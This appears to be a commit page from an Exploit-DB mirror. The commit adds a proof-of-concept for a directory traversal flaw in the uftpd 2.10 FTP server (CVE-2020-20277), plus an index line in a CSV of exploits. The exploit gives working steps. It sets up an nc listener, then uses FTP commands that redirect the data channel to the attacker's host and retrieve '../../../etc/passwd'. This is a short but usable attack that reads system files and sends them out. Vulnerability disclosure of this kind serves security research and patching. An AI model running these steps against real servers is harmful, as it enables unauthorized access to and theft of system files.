bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-08-03

Browse source 
1 changes to exploits/shellcodes

uftpd 2.10 - Directory Traversal (Authenticated)
This commit is contained in:
Offensive Security 2022-08-03 05:01:51 +00:00
parent 16b24da825
commit 636f9a743d
2 changed files with 28 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
exploits/linux/remote/51000.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated)
# Google Dork: N/A
# Exploit Author: Aaron Esau (arinerron)
# Vendor Homepage: https://github.com/troglobit/uftpd
# Software Link: https://github.com/troglobit/uftpd
# Version: 2.7 to 2.10
# Tested on: Linux
# CVE : CVE-2020-20277
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277
# Reference: https://arinerron.com/blog/posts/6
#Product: uftpd 2.7 to 2.10
#Proof-Of-Concept:
1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication.
#Steps
1-Setup nc listener on attacking machine on TCP port 1258
nc -lnvp 1258
2-Login to the FTP service
3-List files
ftp> ls ../../../
3-Set attacker's IP address and retrieve files
PORT 127,0,0,1,1,1002
RETR ../../../etc/passwd

1
files_exploits.csv
View file

@ -18720,6 +18720,7 @@ id,file,description,date,author,type,platform,port
50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",1970-01-01,LiquidWorm,remote,hardware,
50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,

Can't render this file because it is too large.